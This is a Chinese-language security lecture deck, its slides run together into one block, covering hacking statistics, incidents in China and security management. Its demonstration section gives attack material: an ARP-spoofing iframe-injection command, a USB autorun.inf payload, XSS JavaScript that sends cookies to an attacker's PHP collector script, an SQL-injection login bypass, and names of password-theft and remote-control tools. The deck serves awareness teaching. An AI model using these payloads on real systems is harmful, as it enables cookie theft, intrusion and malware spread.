信息安全风险及分析

信息安全风险及分析主讲：高显嵩Email：gaoxiansong@gmail.com个人介绍高显嵩工作经历：中国“互联网信息安全与政府监管”专家组成员中国法证技术研究组成员北京司法局电子数据鉴定协会理事北京广播电视大学特聘专家原微软公司的技术支持工程师项目背景劳动部全国民办中介机构信用等级评定系统劳动部全国知识竞赛评分系统劳动部七个功能平台合并方案北京统计局的报表打印系统北京电大一站式平台合并的规划及实施为考研在线提供整体安全解决方安及实施为国家电力部内部网络设计安全解决方安及实施鞍山移动公司网络规划长期负责北京市安全局国家安全部内部技术培训负责华彬大厦的整个网络规划及实施美国百麦公司北京分公司的整个网络规划及实施主要内容信息安全的重要性信息安全问题分析信息安全管理概述信息安全风险管理信息安全人员管理信息安全重要性当前我国网络信息安全的状况网络及计算机病毒传播泛滥垃圾邮件和病毒邮件泛滥黑客攻击事件频繁用户的个人隐私及计算机的使用权受到侵犯网络犯罪事件频繁监管力度不够涉及版权问题的事件增多没有统一完善的适合国情的安全标准及法规没有职责分明的管理部门或管理小组制约与网络基础设施和技术环境安全体系不健全全民安全意识及计算机网络知识薄弱CERT有关信息安全的统计61322524067731334234024122573213437349859217565265882094137529020000400006000080000100000120000140000160000安全事件统计电子邮件安全统计有关信息安全的统计1713453112624171090243741293784378059908064723660580100020003000400050006000700080009000脆弱点统计CERT有关信息安全的统计网络病毒传播泛滥据2001年调查，我国约73%的计算机用户曾感染病毒，2003年上半年升至83%。其中，感染3次以上的用户高达59%，而且病毒的破坏性较大，被病毒破坏全部数据的占14%，破坏部分数据的占57%。对病毒的预防和发现速度相对缓慢垃圾邮件及病毒邮件泛滥黑客离我们很近1996年信息安全数据显示，世界上平均每２０秒就有一起黑客事件发生，无论是政府机构、军事部门，还是各大银行、大公司，只要与互联网接轨，就难逃黑客的“黑手”。据美国网络安全公司Sophos发布的报告显示，在2008年第一季度，平均每5秒钟就会有一个网页成为黑客们的“盘中餐”。中国网民每年被网络黑客“黑”掉76亿元。FBI计算机犯罪调查报告2002年503家机构中，有60%受到了攻击2002年其中223家（占503家的44%）损失的总和达到$4.55848亿2003年530家机构中有75%（398家）在年内受到了攻击2003年251家（占530家的47%）的经济损失总和为$2.01799734亿全球信息安全损失数额：年份损失额199936亿美元200042亿美元2001129亿美元2002超过200亿美元2003超过280亿美元中国已成为全球黑客的第三大来源地有关统计数据显示，目前我国95%的与因特网相联的网络管理中心都遭到过国境内外黑客的攻击或侵入，受害涉及的覆盖面越来越大、程度越来越深。据国际互联网保安公司Symantec年的报告指出，中国甚至已经成为全球黑客的第三大来源地，竟然有6.9%的攻击国际互联网活动都是由中国发出的。然而面对这种局面，我国却缺乏像西方发达国家那样健全的防范措施。2003年黑客事件中韩新人王网上对抗遭黑客入侵推迟10多分钟中韩围棋新人王对抗赛在中国的新浪网和韩国ｃｙｂｅｒ网站落子，孔杰七段执白中盘战胜韩国的宋泰坤四段。赛前，由于有人以孔杰的名字入侵比赛的服务器，导致比赛推迟了１０多分钟才正常进行。2003年黑客事件百度连续遭遇严重黑客攻击5月15日至5月18日，中文搜索网站百度遭到中国互联网有史以来罕见黑客攻击。据百度负责技术的副总裁刘建国介绍，自5月15日22:00起，百度的检索量突然大增，此番增长并未引起工程师注意。5月16日，攻击更加强烈，每秒钟攻击次数搞到达1000次，同一个词被查询次数最多达38863次。据互联网技术专家介绍，每秒钟攻击100次就已经属于非常严重的攻击，而每秒钟1000次的攻击就实属罕见2003年黑客事件263游戏论坛遭黑客攻击关闭2004年黑客事件腾讯服务器被攻击10月17日早上10时许，国内各地网民陆续腾讯QQ无法登陆。据腾讯QQ内部技术人员透露，一国内团体，利用腾讯QQ服务器漏洞要挟腾讯支付100万美金作为“修复”费用，腾讯QQ不予理睬后，该组织于17日正式发动攻击，腾讯QQ服务器在1个小时内大面积出现故障,不得不全面终止进行抢修.本次行动组织严谨、操作迅速，业内有部分安全管理人士称网络进入软件绑架勒索时代。2004年黑客事件江民网站被攻击2004年10月17日国内著名的杀毒软件厂商江民公司的网站被一名为河马史诗的黑客攻破，页面内容被篡改。攻击缘由：江民公司的最新杀毒软件产品KV2005的升级导致用户在上网时无法打开“邮件监控和网页监控”，用户在江民公司的官方论坛发反映后，江民没有做出及时的回复，也没能在短时间内解决用户的问题。2005年黑客事件频繁也许你的计算机正在被当作从事违法犯罪活动的工具，而当这些悄悄发生的时候，你却一无所知，因为你的电脑已经成为被别人控制的“僵尸电脑”。2005年黑客事件国内首起僵尸网络事件今年27岁的徐立系唐山市某企业工人，其利用某些手段在互联网上传播其编写的特定程序，先后植入4万余台计算机，形成了中国首例BOTNET“僵尸网络。2004年10月至2005年1月，徐立操纵“僵尸网络”对北京大吕黄钟电子商务有限公司所属音乐网站北京飞行网（简称酷乐），发动多次攻击，致使该公司蒙受重大经济损失，并导致北京电信数据中心某机房网络设备大面积瘫痪。2006年黑客事件2006年12月31日中国工商银行被黑06年的最后一天，很多网友都收到一些号称“工行要倒闭，所有存款均没收”之类的新闻链接，地址都是正牌的icbc.com.cn，而不是盗版的1cbc.com.cn。原来工商被黑客入侵，截止当天晚上11点，发现此漏洞已经修改好。07年第一黑客事件深圳律师网被黑当进入该网站之后，就发生事故了，发现，已经被黑.主要有以下字样：天空未留痕迹,鸟儿却已飞过.网络亦是虚拟,疯狂亦是叛逆........~~~尊敬的網站管理員您好~~~.....................台湾是中国的，日本是吃S的...........................如果你是中国人......................请保留此页几天谢谢!.........少年★浪子所向披靡OICQ11888956例子：得到本地登录密码Pulist.exe+findpass.exePasswordReminder.exe例子：记录本地登录密码GINAPassWordSniffer例子得到远程计算机的密码IpcScan2.0例子：更改本地管理员密码WindowsNT/2000/XP/2003/Linux/Unix系统，本地接触可以更改任意用户的密码。一张软盘更改本地管理员密码Ntpassword一张光盘更改本地管理员密码ERDCommander2003例子：ERDCOMMANDER例子：ERDCOMMANDER例子：得到他人的邮件密码密码监听器2.8例子：内网渗透ZXARPS.EXE内网主机访问任意站点被入侵指定的IP段中的用户访问的所有网站都插入一个框架代码zxarps.exe-idx0-ip192.168.0.2-192.168.0.99-port80-insertiframesrc=‘=0height=0ARP协议工作原理ARP欺骗交换机ARP欺骗计算机例子：内网U盘感染U盘在互联网和局域网内交叉使用文件被盗取Autorun.infautorun风暴[autorun]open=shell\open=打开(&O)shell\open\Command=WScript.exe.\autorun.vbsshell\open\Default=1shell\explore=资源管理器(&X)shell\explore\Command=WScript.exe.\autorun.vbs例子：查看网络内任何人的上网记录any@web2.54可以记录同一局域网内任何计算机上浏览的网页内容，察看的邮箱内容，登陆的ftp的内容。用Outlook或者OutlookExpress接受的全部邮件都回同时被该软件接收。例子：查看MSN密码例子：察看星号密码例子：读取缓存密码例子：控制他人计算机Dameware4.5RemoteAdministrator2.1是一种网络管理软件，但是经常被黑客利用来远程控制和管理，被入侵者的计算机。例子：打开对方摄像头和语音SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击XSS跨站脚本构建了个Javascript脚本传递客户端的cookie到黑客的服务器Javascript脚本可以简单的这样写varimg=newImage();img.src=‘get_cookie.php?var=’+encodeURI(document.cookie);然后服务器端使用PHP简单写了个脚本保存Cookie数据?phpif(isset($_GET[‘var’])){file_put_contents(‘./cookie/’.time().‘.txt’,urldecode($_GET[‘var’]));}?构造SQL登陆语句用户名:admin密码:1’or‘1’=‘1其他例子击键记录Office文档挂栽木马网页木马木马捆绑信息安全管理概述例一：局域网内病毒泛滥成灾。例二：网络中为什么会有ARP欺骗的问题发生例三：局域网内计算机故障频繁发生例四：为什么要给每个用户管理员权限先来分析两个例子信息安全的成败取决于两个因素：技术和管理。技术是信息安全的构筑材料，管理是真正的粘合剂和催化剂。人们常说，三分技术，七分管理，可见管理对信息安全的重要性。信息安全管理（InformationSecurityManagement）作为组织完整的管理体系中一个重要的环节，它构成了信息安全具有能动性的部分，是指导和控制组织的关于信息安全风险的相互协调的活动，其针对对象就是组织的信息资产。现实世界里大多数安全事件的发生和安全隐患的存在，与其说是技术上的原因，不如说是管理不善造成的，理解并重视管理对于信息安全的关键作用，对于真正实现信息安全目标来说尤其重要。什么是信息安全管理？根据风险评估结果、法律法规要求、组织业务运作自身需要来确定控制目标与控制措施。实施所选